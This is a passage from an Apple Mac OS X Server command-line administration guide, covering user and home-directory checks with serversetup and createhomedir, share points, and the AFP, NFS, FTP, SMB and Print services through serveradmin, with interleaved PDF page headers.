</key> <string> IMAPAllowed </string> MailAccountLocation A required value indicating the domain name or IP address of the ProductName responsible for storing the user’s mail. <key> kMailAccountLocation </key> <string> domain.example.com </string> AutoForwardValue A required field only if MailAccountState has the value Forward. The value must be a valid RFC 822 email address. <key> kAutoForwardValue </key> <string> user@example.com </string> LL2354.book Page 60 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 61 NotificationState An optional keyword describing whether to notify the user whenever new mail arrives. If provided, it must be set to one of these values: NotificationOff, NotificationLastIP, or NotificationStaticIP. If this field is missing, NotificationOff is assumed. <key> kNotificationState </key> <string> NotificationOff </string> NotificationStaticIP Value An optional IP address, in bracketed, dotted decimal format ([xxx.xxx.xxx.xxx]). If this field is missing, NotificationState is interpreted as NotificationLastIP. The field is used only when NotificationState has the value NotificationStaticIP. <key> kNotificationStatic IPValue </key> <string> [1.2.3.4] </string> SeparateInboxState An optional case-insensitive keyword indicating whether the user manages POP and IMAP mail using different inboxes. If provided, it must be set to one of these values: OneInbox or DualInbox. If this value is missing, the value OneInbox is assumed. <key> kSeparateInboxState </key> <string> OneInbox </string> ShowPOP3InboxInIMAP An optional case-insensitive keyword indicating whether POP messages are displayed in the user’s IMAP folder list. If provided, it must be set to one of these values: ShowPOP3Inbox or HidePOP3Inbox. If this field is missing, the value ShowPOP3Inbox is assumed. <key> kShowPOP3InboxInIMAP </key> <string> HidePOP3Inbox </string> MailAttribute field Description Sample values LL2354.book Page 61 Monday, October 20, 2003 9:47 AM 62 Chapter 7 Working With Users and Groups Checking a Server User’s Name, UID, or Password You can use the following commands to check the name, UID, or password of a user in the server’s local directory. Note: These tasks only apply to the local directory on the server. To see if a full name is already in use: $ serversetup -verifyRealName "longname" The command displays a 1 if the name is already in the directory, 0 if it isn’t. To see if a short name is already in use: $ serversetup -verifyName shortname The command displays a 1 if the name is already in the directory, 0 if it isn’t. To see if a UID is already in use: $ serversetup -verifyUID userid The command displays a 1 if the UID is already in the directory, 0 if it isn’t. To test a user’s password: $ serversetup -verifyNamePassword shortname password The command displays a 1 if the password is good, 0 if it isn’t. To view the names associated with a UID: $ serversetup -getNamesByID userid No response means UID not valid. To generate the default UNIX short name for a user long name: $ serversetup -getUNIXName "longname" LL2354.book Page 62 Monday, October 20, 2003 9:47 AM Chapter 7 Working With Users and Groups 63 Creating a User’s Home Directory Normally, you can create a user's home directory by clicking the Create Home Now button on the Homes pane of Workgroup Manager. You can also create home directory folders using the createhomedir tool. Otherwise, Mac OS X Server creates the user’s home directory when the user logs in for the first time. You can use createhomedir to create • A home directory for a particular user (-u option) • Home directories for all users in a directory domain (-n or -l option) • Home directories for all users in all domains in the directory search path (-a option) For more information, type man createhomedir to view the man page. In all cases, the home directories are created on the server where you run the tool. To create a home directory for a particular user: $ createhomedir [(-a|-l|-n domain)] -u userid To create a home directory for users in the local domain: $ createhomedir -l To create a home directory for users in the local domain: $ createhomedir [(-a|-l|-n domain)] -u userid You can also create a user’s home directory using the serversetup tool. To create a home directory for a particular user: $ serversetup -createHomedir userid The command displays a 1 if the user ID you specify doesn’t exist. Mounting a User’s Home Directory You can use the mnthome command to mount a user’s home directory. For more information, see the man page. Creating a Group Folder You can use the CreateGroupFolder command to set up group folders. For more information see the man page. Checking a User’s Administrator Privileges To see if a user is a server administrator: $ serversetup -isAdministrator shortname The command displays a 0 if the user has administrator privileges, 0 if the user doesn’t. LL2354.book Page 63 Monday, October 20, 2003 9:47 AM LL2354.book Page 64 Monday, October 20, 2003 9:47 AM 8 65 8 Working With File Services Commands you can use to create share points and manage AFP, NFS, Windows (SMB), and FTP services in Mac OS X Server. Share Points You can use the sharing tool to list, create, and modify share points. Listing Share Points To list existing share points: $ sharing -l In the resulting list, there’s a section of properties similar to the following for each share point defined on the server. (1 = yes, true, or enabled. 0 = false, no, or disabled.) name: Share1 path: /Volumes/100GB afp: { name: Share1 shared: 1 guest access: 0 inherit perms: 0 } ftp: { name: Share1 shared: 1 guest access: 1 } smb: { name: Share1 shared: 1 guest access: 1 inherit perms: 0 oplocks: 0 strict locking: 0 directory mask: 493 create mask: 420 } LL2354.book Page 65 Monday, October 20, 2003 9:47 AM 66 Chapter 8 Working With File Services Creating a Share Point To create a share point: $ sharing -a path [-n customname] [-A afpname] [-F ftpname] [-S smbname] [-s shareflags] [-g guestflags] [-i inheritflags] [-c creationmask] [-d directorymask] [-o oplockflag] [-t strictlockingflag] Examples $ sharing -a /Volumes/100GB/Art Creates a share point named Art, shared using AFP, FTP, and SMB, and using the name Art for all three types of clients. $ sharing -a /Volumes/100GB/Windows\ Docs -n WinDocs -S Documents -s 001 -o 1 Parameter Description path The full path to the directory you want to share. customname The name of the share point. If you don’t specify this custom name, it’s set to the name of the directory, the last name in path. afpname The share point name shown to and used by AFP clients. This name is separate from the share point name. ftpname The share point name shown to and used by FTP clients. smbname The share point name shown to and used by SMB clients. shareflags A three-digit binary number indicating which protocols are used to share the directory. The digits represent, from left to right, AFP, FTP, and SMB. 1=shared, 0=not shared. guestflags A group of three flags indicating which protocols allow guest access. The flags are written as a three-digit binary number with the digits representing, from left to right, AFP, FTP, and SMB. 1=guests allowed, 0=guests not allowed. inheritflags A group of two flags indicating whether new items in AFP or SMB share points inherit the ownership and access permissions of the parent folder. The flags are written as a two-digit binary number with the digits representing, from left to right, AFP and SMB. 1=inherit, 0=don’t inherit. creationmask The SMB creation mask. Default=0644. directorymask The SMB directory mask. Default=0755. oplockflag Specifies whether opportunistic locking is allowed for an SMB share point. 1=enable oplocks, 0=disable oplocks. For more information on oplocks, see the file services administration guide. strictlockingflag Specifies whether strict locking is used on an SMB share point. 1=enable strict locking, 0=disable. For more information on strict locking, see the file services administration guide. LL2354.book Page 66 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 67 Shares the directory named Windows Docs on the disk 100GB. The share point is named WinDocs for server management purposes, but SMB users see it as Documents. It’s shared using only the SMB protocol with oplocks enabled. Modifying a Share Point To change share point settings: $ sharing -e sharepointname [-n customname] [-A afpname] [-F ftpname] [-S smbname] [-s shareflags] [-g guestflags] [-i inheritflags] [-c creationmask] [-d directorymask] [-o oplockflag] [-t strictlockingflag] Disabling a Share Point To disable a share point: $ sharing -r sharepointname AFP Service Starting and Stopping AFP Service To start AFP service: $ sudo serveradmin start afp To stop AFP service: $ sudo serveradmin stop afp Checking AFP Service Status To see if AFP service is running: $ sudo serveradmin status afp To see complete AFP status: $ sudo serveradmin fullstatus afp Viewing AFP Settings To list all AFP service settings: $ sudo serveradmin settings afp Parameter Description sharepointname The current name of the share point. Other parameters See the parameter descriptions under “Creating a Share Point” on page 66. Parameter Description sharepointname The current name of the share point. LL2354.book Page 67 Monday, October 20, 2003 9:47 AM 68 Chapter 8 Working With File Services To list a particular setting: $ sudo serveradmin settings afp:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings afp:loggingAttributes:* Changing AFP Settings You can change AFP service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings afp:setting = value To change several settings: $ sudo serveradmin settings afp:setting = value afp:setting = value afp:setting = value [...] Control-D List of AFP Settings The following table lists AFP settings as they appear using serveradmin. Parameter Description setting Any of the AFP service settings. For a complete list of settings, type serveradmin settings afp or see “List of AFP Settings” on this page. Parameter Description setting An AFP service setting. To see a list of available settings, type $ sudo serveradmin settings afp or see “List of AFP Settings” on this page. value An appropriate value for the setting. Enclose text strings in double quotes (for example, "text string"). Parameter (afp:) Description activityLog Turn activity logging on or off. Default = no activityLogPath Location of the activity log file. Default = /Library/Logs/AppleFileService/ AppleFileServiceAccess.log LL2354.book Page 68 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 69 activityLogSize Rollover size (in kilobytes) for the activity log. Only used if activityLogTime isn’t specified. Default = 1000 activityLogTime Rollover time (in days) for the activity log. Default = 7 admin31GetsSp Set to true to force administrative users on Mac OS X to see share points instead of all volumes. Default = yes adminGetsSp Set to true to force administrative users on Mac OS 9 to see share points instead of all volumes. Default = no afpServerEncoding Encoding used with Mac OS 9 clients. Default = 0 afpTCPPort TCP port used by AFP on server. Default = 548 allowRootLogin Allow user to log in as root. Default = no attemptAdminAuth Allow an administrator user to masquerade as another user. Default = yes authenticationMode Authentication mode. Can be: standard kerberos standard_and_kerberos Default = "standard_and_kerberos" autoRestart Whether the AFP service should restart automatically when abnormally terminated. Default = yes clientSleepOnOff Allow client computers to sleep. Default = yes clientSleepTime Time (in hours) that clients are allowed to sleep. Default = 24 createHomeDir Create home directories. Default = yes errorLogPath The location of the error log. Default = /Library/Logs/AppleFileService/ AppleFileServiceError.log errorLogSize Rollover size (in kilobytes) for the error log. Only used if errorLogTime isn’t specified. Default = 1000 errorLogTime Rollover time (in days) for the error log. Default = 0 Parameter (afp:) Description LL2354.book Page 69 Monday, October 20, 2003 9:47 AM 70 Chapter 8 Working With File Services guestAccess Allow guest users access to the server. Default = yes idleDisconnectFlag: adminUsers Enforce idle disconnect for administrative users. Default = yes idleDisconnectFlag: guestUsers Enforce idle disconnect for guest users. Default = yes idleDisconnectFlag: registeredUsers Enforce idle disconnect for registered users. Default = yes idleDisconnectFlag: usersWithOpenFiles Enforce idle disconnect for users with open files. Default = yes idleDisconnectMsg The idle disconnect message. Default = "" idleDisconnectOnOff Enable idle disconnect. Default = no idleDisconnectTime Idle time (in minutes) allowed before disconnect. Default = 10 kerberosPrincipal Kerberos server principal name. Default = "afpserver" loggingAttributes: logCreateDir Record directory creations in the activity log. Default = yes loggingAttributes: logCreateFile Record file creations in the activity log. Default = yes loggingAttributes: logDelete Record file deletions in the activity log. Default = yes loggingAttributes: logLogin Record user logins in the activity log. Default = yes loggingAttributes: logLogout Log user logouts in the activity log. Default = yes loggingAttributes: logOpenFork Log file opens in the activity log. Default = yes loginGreeting The login greeting message. Default = "" loginGreetingTime The last time the login greeting was set or updated. maxConnections Maximum number of simultaneous user sessions allowed by the server. Default = -1 (unlimited) maxGuests Maximum number of simultaneous guest users allowed. Default = -1 (unlimited) Parameter (afp:) Description LL2354.book Page 70 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 71 maxThreads Maximum number of AFP threads. (Must be specified at startup.) Default = 40 noNetworkUsers Indication to client that all users are users on the server. Default = no permissionsModel How permissions are enforced. Can be set to: classic_permissions unix_with_classic_admin_permissions unix_permissions Default = "classic_permissions" recon1SrvrKeyTTLHrs Time-to-live (in hours) for the server key used to generate reconnect tokens. Default = 168 recon1TokenTTLMins Time-to-live (in minutes) for a reconnect token. Default = 10080 reconnectFlag Allow reconnect options. Can be set to: none all no_admin_kills Default = "all" reconnectTTLInMin Time-to-live (in minutes) for a disconnected session waiting reconnection. Default = 1440 registerAppleTalk Advertise the server using AppleTalk NBP. Default = yes registerNSL Advertise the server using Rendezvous. Default = yes sendGreetingOnce Send the login greeting only once. Default = no shutdownThreshold Don’t modify. Internal use only. specialAdminPrivs Grant administrative users super user read/write privileges. Default = no SSHTunnel Allow SSH tunneling. Default = yes TCPQuantum TCP message quantum. Default = 262144 tickleTime Frequency of tickles sent to client. Default = 30 updateHomeDirQuota Enforce quotas on the users volume. Default = yes Parameter (afp:) Description LL2354.book Page 71 Monday, October 20, 2003 9:47 AM 72 Chapter 8 Working With File Services List of AFP serveradmin Commands In addition to the standard start, stop, status, and settings commands, you can use serveradmin to issue the following service-specific AFP commands. Listing Connected Users You can use the serveradmin getConnectedUsers command to retrieve information about connected AFP users. In particular, you can use this command to retrieve the session IDs you need to disconnect or send messages to users. To list connected users: $serveradmin command afp:command = getConnectedUsers Output The following array of settings is displayed for each connected user: afp:usersArray:_array_index:i:disconnectID = <disconnectID> afp:usersArray:_array_index:i:flags = <flags> afp:usersArray:_array_index:i:ipAddress = <ipAddress> afp:usersArray:_array_index:i:lastUseElapsedTime = <lastUseElapsed> afp:usersArray:_array_index:i:loginElapsedTime = <loginElapsedTime> afp:usersArray:_array_index:i:minsToDisconnect = <minsToDisconnect> afp:usersArray:_array_index:i:name = <name> afp:usersArray:_array_index:i:serviceType = <serviceType> afp:usersArray:_array_index:i:sessionID = <sessionID> afp:usersArray:_array_index:i:sessionType = <sessionType> afp:usersArray:_array_index:i:state = <state> useAppleTalk Don’t modify. Internal use only. useHomeDirs Default = no Parameter (afp:) Description Command (afp:command=) Description cancelDisconnect Cancel a pending user disconnect. See “Canceling a User Disconnect” on page 74. disconnectUsers Disconnect AFP users. See “Disconnecting AFP Users” on page 73. getConnectedUsers List settings for connected users. See “Listing Connected Users” on this page. getHistory View a periodic record of file data throughput or number of user connections. See “Listing AFP Service Statistics” on page 75. getLogPaths Display the locations of the AFP service activity and error logs. sendMessage Send a text message to connected AFP users. See “Sending a Message to AFP Users” on page 73. syncSharePoints Update share point information after changing settings. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 72 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 73 Sending a Message to AFP Users You can use the serveradmin sendMessage command to send a text message to connected AFP users. Users are specified by session ID. To send a message: $ sudo serveradmin command afp:command = sendMessage afp:message = "message-text" afp:sessionIDsArray:_array_index:0 = sessionid1 afp:sessionIDsArray:_array_index:1 = sessionid2 afp:sessionIDsArray:_array_index:2 = sessionid3 [...] Control-D Disconnecting AFP Users You can use the serveradmin disconnectUsers command to disconnect AFP users. Users are specified by session ID. You can specify a delay time before disconnect and a warning message. To disconnect users: $ sudo serveradmin command afp:command = disconnectUsers afp:message = "message-text" afp:minutes = minutes-until afp:sessionIDsArray:_array_index:0 = sessionid1 afp:sessionIDsArray:_array_index:1 = sessionid2 afp:sessionIDsArray:_array_index:2 = sessionid3 [...] Control-D Parameter Description message-text The message that appears on client computers. sessionidn The session ID of a user you want to receive the message. To list the session IDs of connected users, use the getConnectedUsers command. See “Listing Connected Users” on page 72. Parameter Description message-text The text of a message that appears on client computers in the disconnect announcement dialog. minutes-until The number of minutes between the time the command is issued and the users are disconnected. sessionidn The session ID of a user you want to disconnect. To list the session IDs of connected users, use the getConnectedUsers command. See “Listing Connected Users” on page 72. LL2354.book Page 73 Monday, October 20, 2003 9:47 AM 74 Chapter 8 Working With File Services Output afp:command = "disconnectUsers" afp:messageSent = "<message>" afp:timeStamp = "<time>" afp:timerID = <disconnectID> <user listing> afp:status = <status> Canceling a User Disconnect You can use the serveradmin cancelDisconnect command to cancel a disconnectUsers command. Users receive an announcement that they’re no longer scheduled to be disconnected. To cancel a disconnect: $ sudo serveradmin command afp:command = cancelDisconnect afp:timerID = timerID Control-D Output afp:command = "cancelDisconnect" afp:timeStamp = "<time>" afp:status = <status> Value Description <message> The message sent to users in the disconnect announcement dialog. <time> The time when the command was issued. <disconnectID> An integer that identifies this particular disconnect. You can use this ID with the cancelDisconnect command to cancel the disconnect. <user listing> A standard array of user settings for each user scheduled for disconnect. For a description of these settings, see “Listing Connected Users” on page 72. <status> A command status code: 0 = command successful Parameter Description timerID The integer value of the afp:timerID parameter output when you issued the disconnectUsers command. You can also find this number by listing any user scheduled to be disconnected and looking at the value of the disconnectID setting for the user. Value Description <time> The time at which the command was issued. <status> A command status code: 0 = command successful LL2354.book Page 74 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 75 Listing AFP Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of connections and the data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command afp:command = getHistory afp:variant = statistic afp:timeScale = scale Control-D Output afp:nbSamples = <samples> afp:samplesArray:_array_index:0:vn = <sample> afp:samplesArray:_array_index:0:t = <time> afp:samplesArray:_array_index:1:vn = <sample> afp:samplesArray:_array_index:1:t = <time> [...] afp:samplesArray:_array_index:i:vn = <sample> afp:samplesArray:_array_index:i:t = <time> afp:vnLegend = "<legend>" afp:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of connected users (average during sampling period) v2 - throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify afp:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "CONNECTIONS" for v1 "THROUGHPUT" for v2 <sample> The numerical value of the sample. For connections (v1), this is integer average number of users. For throughput, (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 75 Monday, October 20, 2003 9:47 AM 76 Chapter 8 Working With File Services Viewing AFP Log Files You can use tail or any other file listing tool to view the contents of the AFP service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current AFP error and activity logs are located. To display the log paths: $ sudo serveradmin command afp:command = getLogPaths Output afp:accesslog = <access-log> afp:errorlog = <error-log> NFS Service Starting and Stopping NFS Service NFS service is started automatically when a share point is exported using NFS. The NFS daemons that satisfy client requests continue to run until there are no more NFS exports and the server is restarted. Checking NFS Service Status To see if NFS service and related processes are running: $ sudo serveradmin status nfs To see complete NFS status: $ sudo serveradmin fullstatus nfs Viewing NFS Settings To list all NFS service settings: $ sudo serveradmin settings nfs To list a particular setting: $ sudo serveradmin settings nfs:setting Value Description <access-log> The location of the AFP service access log. Default = /Library/Logs/AppleFileService/ AppleFileServiceAccess.log <error-log> The location of the AFP service error log. Default = /Library/Logs/AppleFileService/ AppleFileServiceError.log LL2354.book Page 76 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 77 Changing NFS Service Settings Use the following parameters with the serveradmin command to change settings for the NFS service. FTP Service Starting FTP Service To start FTP service: $ sudo serveradmin start ftp Stopping FTP Service To stop FTP service: $ sudo serveradmin stop ftp Checking FTP Service Status To see if FTP service is running: $ sudo serveradmin status ftp To see complete FTP status: $ sudo serveradmin fullstatus ftp Viewing FTP Settings To list all FTP service settings: $ sudo serveradmin settings ftp To list a particular setting: $ sudo serveradmin settings ftp:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings ftp:logCommands:* Parameter (nfs:) Description nbDaemons Default = 6 To reduce the number of daemons, you must restart the server after changing this value. useTCP Default = yes You must restart the server after changing this value. useUDP Default = yes You must restart the server after changing this value. LL2354.book Page 77 Monday, October 20, 2003 9:47 AM 78 Chapter 8 Working With File Services Changing FTP Settings You can change FTP service settings using the serveradmin application. To change a setting: $ sudo serveradmin settings ftp:setting = value To change several settings: $ sudo serveradmin settings ftp:setting = value ftp:setting = value ftp:setting = value [...] Control-D FTP Settings Use the following parameters with the serveradmin command to change settings for the FTP service. Parameter Description setting An FTP service setting. To see a list of available settings, type $ sudo serveradmin settings ftp or see “FTP Settings” on this page. value An appropriate value for the setting. Parameter (ftp:) administratorEmailAddress Default = "user@hostname" anonymous-root Default = "/Library/FTPServer/FTPRoot" anonymousAccessPermitted Default = no authLevel Default = "STANDARD" bannerMessage Default = "This is the "Banner" message for the Mac OS X Server's FTP server process. FTP clients will receive this message immediately before being prompted for a name and password. PLEASE NOTE: Some FTP clients may exhibit problems if you make this file too long. ----------------------------------" chrootType Default = "STANDARD" enableMacBinAndDmgAutoConversion Default = yes ftpRoot Default = "/Library/FTPServer/FTPRoot" LL2354.book Page 78 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 79 List of FTP serveradmin Commands You can use the following commands with the serveradmin application to manage FTP service. logCommands:anonymous Default = no logCommands:guest Default = no logCommands:real Default = no loginFailuresPermitted Default = 3 logSecurity:anonymous Default = no logSecurity:guest Default = no logSecurity:real Default = no logToSyslog Default = no logTransfers:anonymous:inbound Default = yes logTransfers:anonymous:outbound Default = yes logTransfers:guest:inbound Default = no logTransfers:guest:outbound Default = no logTransfers:real:inbound Default = yes logTransfers:real:outbound Default = yes maxAnonymousUsers Default = 50 maxRealUsers Default = 50 showBannerMessage Default = yes showWelcomeMessage Default = yes welcomeMessage Default = "This is the "Welcome" message for the Mac OS X Server's FTP server process. FTP clients will receive this message right after a successful log in. ----------------------------------" Parameter (ftp:) ftp:command= Description getConnectedUsers List connected users. See “Checking for Connected FTP Users” on page 80. LL2354.book Page 79 Monday, October 20, 2003 9:47 AM 80 Chapter 8 Working With File Services Viewing the FTP Transfer Log You can use tail or any other file listing tool to view the contents of the FTP transfer log. To view the latest entries in the transfer log: $ tail log-file The default location of log-file is /Library/Logs/FTP.transger.log. You can use the serveradmin getLogPaths command to see where the current transfer log is located. To display the log path: $ sudo serveradmin command ftp:command = getLogPaths Checking for Connected FTP Users To see how many FTP users are connected: $ ftpcount or $ sudo serveradmin command ftp:command = getConnectedUsers Windows (SMB) Service Starting and Stopping SMB Service To start SMB service: $ sudo serveradmin start smb To stop SMB service: $ sudo serveradmin stop smb Checking SMB Service Status To see if SMB service is running: $ sudo serveradmin status smb To see complete SMB status: $ sudo serveradmin fullstatus smb getLogPaths Show location of the FTP transfer log file. See “Viewing the FTP Transfer Log” on this page. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. ftp:command= Description LL2354.book Page 80 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 81 Viewing SMB Settings To list all SMB service settings: $ sudo serveradmin settings smb To list a particular setting: $ sudo serveradmin settings smb:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, $ sudo serveradmin settings smb:adminCommands:* Changing SMB Settings You can change SMB service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings smb:setting = value To change several settings: $ sudo serveradmin settings smb:setting = value smb:setting = value smb:setting = value [...] Control-D Parameter Description setting An SMB service setting. To see a list of available settings, type $ sudo serveradmin settings smb or see “List of SMB Service Settings” on page 82. Parameter Description setting An SMB service setting. To see a list of available settings, type $ sudo serveradmin settings smb or see “List of SMB Service Settings” on page 82. value An appropriate value for the setting. For a list of values that correspond to GUI controls in the Server Admin application, see “List of SMB Service Settings” on page 82. LL2354.book Page 81 Monday, October 20, 2003 9:47 AM 82 Chapter 8 Working With File Services List of SMB Service Settings Use the following parameters with the serveradmin command to change settings for the SMB service. Parameter (smb:) Description adminCommands:homes Whether home directories are mounted automatically when Windows users log in so you don’t have to set up individual share points for each user. Can be set to: yes | no Corresponds to the “Enable virtual share points” checkbox in the Advanced pane of Window service settings in the Server Admin GUI application. adminCommands:serverRole The authentication role played by the server. Can be set to: "standalone" "domainmember" "primarydomaincontroller" Corresponds to the Role pop-up menu in the General pane of Windows service settings in the Server Admin GUI application. domain master Whether the server is providing domain master browser service. Can be set to: yes | no Corresponds to the Domain Master Browser checkbox in the Advanced pane of Window service settings in the Server Admin GUI application. dos charset The code page being used. Can be set to: CP437 (Latin US) CP737 (Greek) CP775 (Baltic) CP850 (Latin1) CP852 (Latin2) CP861 (Icelandic) CP866 (Cyrillic) CP932 (Japanese SJIS) CP936 (Simplified Chinese) CP949 (Korean Hangul) CP950 (Traditional Chinese) CP1251 (Windows Cyrillic) Corresponds to the Code Page pop-up menu on the Advanced pane of Windows service settings in the Server Admin GUI application. LL2354.book Page 82 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 83 local master Whether the server is providing workgroup master browser service. Can be set to: yes | no Corresponds to the Workgroup Master Browser checkbox in the Advanced pane of Window service settings in the Server Admin GUI application. log level The amount of detail written to the service logs. Can be set to: 0 (Low: errors and warnings only) 1 (Medium: service start and stop, authentication failures, browser name registrations, and errors and warnings) 2 (High: service start and stop, authentication failures, browser name registration events, log file access, and errors and warnings) Corresponds to the Log Detail pop-up menu in the Logging pane of Window service settings in the Server Admin GUI application map to guest Whether guest access is allowed. Can be set to: "Never" (No guest access) "Bad User" (Allow guest access) Corresponds to the “Allow Guest access” checkbox in the Access pane of Window service settings in the Server Admin GUI application max smbd processes The maximum allowed number of smb server processes. Each connection uses its own smbd process, so this is the same as specifying the maximum number of SMB connections. 0 means unlimited. This corresponds to the “maximum” client connections field in the Access pane of the Windows service settings in the Server Admin GUI application. netbios name The server’s NetBIOS name. Can be set to a maximum of 15 bytes of UTF-8 characters. Corresponds to the Computer Name field in the General pane of the Windows service settings in the Server Admin GUI application. server string Text that helps identify the server in the network browsers of client computers. Can be set to a maximum of 15 bytes of UTF-8 characters. Corresponds to the Description field in the General pane of the Windows service settings in the Server Admin GUI application. wins support Whether the server provides WINS support. Can be set to: yes | no Corresponds to the WINS Registration “Off” and “Enable WINS server” selections in the Advanced pane of the Windows service settings in the Server Admin GUI application. Parameter (smb:) Description LL2354.book Page 83 Monday, October 20, 2003 9:47 AM 84 Chapter 8 Working With File Services List of SMB serveradmin Commands You can use these commands with the serveradmin tool to manage SMB service. Listing SMB Users You can use the serveradmin getConnectedUsers command to retrieve information about connected SMB users. For example, you can use this command to retrieve the session IDs you need to disconnect users. To list connected users: $serveradmin command smb:command = getConnectedUsers wins server The name of the WINS server used by the server. Corresponds to the WINS Registration “Register with WINS server” selection and field in the Advanced pane of the Windows service settings in the Server Admin GUI application. workgroup The server’s workgroup. Can be set to a maximum of 15 bytes of UTF-8 characters. Corresponds to the Workgroup field in the General pane of the Windows service settings in the Server Admin GUI application. Parameter (smb:) Description smb:command= Description disconnectUsers Disconnect SMB users. See “Disconnecting SMB Users” on page 85. getConnectedUsers List users currently connected to an SMB service. See “Listing SMB Users” on this page. getHistory List connection statistics. See “Listing SMB Service Statistics” on page 86. getLogPaths Show location of service log files. See “Viewing SMB Service Logs” on page 87. syncPrefs Update the service to recognize changes in share points. See “Updating Share Point Information” on page 86. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 84 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 85 Output The following array of settings is displayed for each connected user: smb:usersArray:_array_index:i:disconnectID = <disconnectID> smb:usersArray:_array_index:i:sessionID = <sessionID> smb:usersArray:_array_index:i:connectAt = <connect-time> smb:usersArray:_array_index:i:service = <service> smb:usersArray:_array_index:i:loginElapsedTime = <login-elapsed-time> smb:usersArray:_array_index:i:name = "<name>" smb:usersArray:_array_index:i:ipAddress = "<ip-address>" Disconnecting SMB Users You can use the serveradmin disconnectUsers command to disconnect SMB users. Users are specified by session ID. To disconnect users: $ sudo serveradmin command smb:command = disconnectUsers smb:sessionIDsArray:_array_index:0 = sessionid1 smb:sessionIDsArray:_array_index:1 = sessionid2 smb:sessionIDsArray:_array_index:2 = sessionid3 [...] Control-D Output smb:command = "disconnectUsers" smb:status = <status> Value returned by getConnectedUsers (smb:usersArray:_array_index:<n>:) Description <sessionID> An integer that identifies the user session. <connect-time> The date and time when the user connected to the server. <service> The share point the user is accessing. <login-elapsed-time> The elapsed time since the user connected. <name> The user’s name. <ip-address> The user’s IP address. Parameter Description sessionidn The session ID of a user you want to disconnect. To list the session IDs of connected users, use the getConnectedUsers command. See “Listing SMB Users” on page 84. Value Description <status> A command status code: 0 = command successful LL2354.book Page 85 Monday, October 20, 2003 9:47 AM 86 Chapter 8 Working With File Services Listing SMB Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of SMB connections. Samples are taken once each minute. To list samples: $ sudo serveradmin command smb:command = getHistory smb:variant = v1 smb:timeScale = scale Control-D Output smb:nbSamples = <samples> smb:samplesArray:_array_index:0:vn = <sample> smb:samplesArray:_array_index:0:t = <time> smb:samplesArray:_array_index:1:vn = <sample> smb:samplesArray:_array_index:1:t = <time> [...] smb:samplesArray:_array_index:i:vn = <sample> smb:samplesArray:_array_index:i:t = <time> smb:v1Legend = "CONNECTIONS" smb:currentServerTime = <servertime> Updating Share Point Information After you make a change to an SMB share point using the sharing tool, you need to update the SMB service information. To update SMB share point information: $ sudo serveradmin command smb:command = syncPrefs Parameter Description v1 The number of connected users (average during sampling period). scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify smb:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "CONNECTIONS" for v1 "THROUGHPUT" for v2 <sample> The numerical value of the sample. For connections (v1), this is integer average number of users. For throughput, (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 86 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 87 Viewing SMB Service Logs You can use tail or any other file listing tool to view the contents of the SMB service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current SMB logs are located. To display the log paths: $ sudo serveradmin command smb:command = getLogPaths Output smb:fileServiceLog = <smb-log> smb:nameServiceLog = <name-log> Value Description <smb-log> The location of the SMB service log. Default = /var/log/samba/log.smbd <name-log> The location of the name service log. Default = /var/log/samba/log.nmbd LL2354.book Page 87 Monday, October 20, 2003 9:47 AM LL2354.book Page 88 Monday, October 20, 2003 9:47 AM 9 89 9 Working With Print Service Commands you can use to manage the Print service in Mac OS X Server. Starting and Stopping Print Service To start Print service: $ sudo serveradmin start print To stop Print service: $ sudo serveradmin stop print Checking the Status of Print Service To see summary status of Print service: $ sudo serveradmin status print To see detailed status of Print service: $ sudo serveradmin fullstatus print Viewing Print Service Settings To list Print service configuration settings: $ sudo serveradmin settings print To list a particular setting: $ sudo serveradmin settings print:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, to see all settings for a particular print queue: $ sudo serveradmin settings print:queuesArray:_array_id:queue-id:* where queue-id is an id such as 